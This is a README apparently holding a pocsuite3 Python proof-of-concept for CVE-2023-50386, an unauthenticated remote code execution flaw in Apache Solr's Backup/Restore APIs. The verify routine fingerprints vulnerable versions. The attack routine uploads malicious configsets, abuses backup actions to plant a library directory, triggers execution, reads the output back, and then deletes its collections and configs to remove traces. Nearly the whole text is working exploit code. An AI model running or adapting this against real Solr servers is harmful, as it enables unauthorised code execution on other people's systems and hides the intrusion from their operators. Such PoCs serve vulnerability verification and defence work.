README.md
Rendering markdown...
# -*- coding: utf-8 -*-
# @Time : 2024/2/21 20:47
# @Author : vvmdx
# @File : CVE-2023-50386.py
# @Project : pocsuite3
"""
POC 先判断是否需要登录,再判断版本,如果无需登录且版本在影响范围内的话,开始实施攻击,最后清理痕迹
"""
import json
import re
from pocsuite3.api import VUL_TYPE, Output, POCBase, POC_CATEGORY, register_poc, requests
class SolrPOC(POCBase):
vulID = ''
version = '1.0'
author = ['vvmdx']
vulDate = '2024-02-09'
createDate = '2024-02-21'
updateDate = '2024-02-28'
references = ['https://solr.apache.org/security.html#cve-2023-50386-apache-solr-backuprestore-apis-allow-for-deployment-of-executables-in-malicious-configsets']
name = 'Apache Solr Backup/Restore APIs 未授权访问导致远程代码执行(CVE-2023-50386)'
appPowerLink = 'https://solr.apache.org/'
appName = 'Apache Solr'
appVersion = '6.0.0 through 8.11.2\n9.0.0 before 9.4.1'
vulType = VUL_TYPE.CODE_EXECUTION
desc = ''''''
samples = [
]
category = POC_CATEGORY.EXPLOITS.WEBAPP
pocDesc = ''' 验证模式下判断版本,攻击模式下代码执行 '''
def _verify(self):
result = {}
if self.url.endswith("/"):
url = self.url[:-1]
else:
url = self.url
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
}
solr_url = url + "/solr/"
resp_solr = requests.get(solr_url, headers=header, verify=False)
zk_url = url + "/solr/admin/zookeeper"
resp_zk = requests.get(zk_url, headers=header, verify=False)
# 1. 是否未授权访问
# 2. 是否为集群启动
if resp_solr.status_code == 200 and resp_zk.status_code == 200:
# 3. 提取版本号
pattern = re.compile(r'href="img/favicon.ico\?_=(\d+\.\d+\.\d+)"')
match = pattern.search(resp_solr.text)
if match is not None:
version_str = match[1]
# 4. 检查版本是否在漏洞影响范围内
if self.check_version(version_str, "6.0.0", "8.11.3") or self.check_version(version_str, "9.0.0", "9.4.1"):
# 5. 是的话就在漏洞范围内
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = solr_url
return self.parse_output(result)
def get_version_tuple(self, version_str):
# 转为tuple方便直接比大小
return tuple(map(int, (version_str.split("."))))
# 检查版本是否在漏洞影响范围内
def check_version(self, version_str, low_str, up_str):
version = self.get_version_tuple(version_str)
low = self.get_version_tuple(low_str)
up = self.get_version_tuple(up_str)
return low <= version < up
def _attack(self):
result = {}
if self.url.endswith("/"):
url = self.url[:-1]
else:
url = self.url
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
}
url = url + "/solr/admin"
# 1. 上传压缩包conf1和conf2
upload_url = url + "/configs?action=UPLOAD&name=conf1"
if self.upload(upload_url, "conf1.zip"):
# 上传成功
# 2. 创建collection
create_url = url + "/collections?action=CREATE&name=collection1&numShards=1&replicationFactor=1&wt=json&collection.configName=conf1"
if self.action(create_url):
# 创建成功
# 3. 备份第一步
backup_url_1 = url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/&name=collection2_shard1_replica_n1"
if self.action(backup_url_1):
# 备份成功
# 4. 备份第二步
backup_url_2 = url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/collection2_shard1_replica_n1&name=lib"
if self.action(backup_url_2):
# 备份成功
# 5. 上传conf2
upload_url_2 = url + "/configs?action=UPLOAD&name=conf2"
if self.upload(upload_url_2, "conf2.zip"):
# 上传成功
# 6. 执行
exec_url = url + "/collections?action=CREATE&name=collection2&numShards=1&replicationFactor=1&wt=json&collection.configName=conf2"
resp_exec = requests.get(exec_url, headers=header, verify=False)
if resp_exec.status_code == 400:
read_url = url + "/info/properties"
resp_read = requests.get(read_url, headers=header, verify=False)
if resp_read.status_code == 200 and "root:" in resp_read.text:
# 执行成功
# 7. 读取回显
json_data = json.loads(resp_read.text)
exec_res = json_data['system.properties']['java.library.path']
result['VerifyInfo'] = {}
result['VerifyInfo']['result'] = exec_res
# 清理痕迹
resp_del = requests.get(url + "/collections?action=DELETE&name=collection1", headers=header, verify=False)
# 要先清理collection,config清理先后顺序无所谓
if resp_del.status_code == 200:
requests.get(url + "/configs?action=DELETE&name=conf1", headers=header, verify=False)
requests.get(url + "/configs?action=DELETE&name=conf2", headers=header, verify=False)
return self.parse_output(result)
def action(self, action_url):
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
}
resp = requests.get(action_url, headers=header, verify=False)
json_data = json.loads(resp.text)
if resp.status_code == 200 and json_data['responseHeader']['status'] == 0 and "success" in json_data:
return True
return False
def upload(self, upload_url, file_name):
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36",
"Content-Type": "application/octet-stream"
}
with open(file_name, "rb") as file:
# 直接将zip的二进制数据作为post body传
resp = requests.post(upload_url, headers=header, data=file, verify=False)
json_data = json.loads(resp.text)
if resp.status_code == 200 and json_data['responseHeader']['status'] == 0:
return True
return False
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Target is not vulnerable')
return output
register_poc(SolrPOC)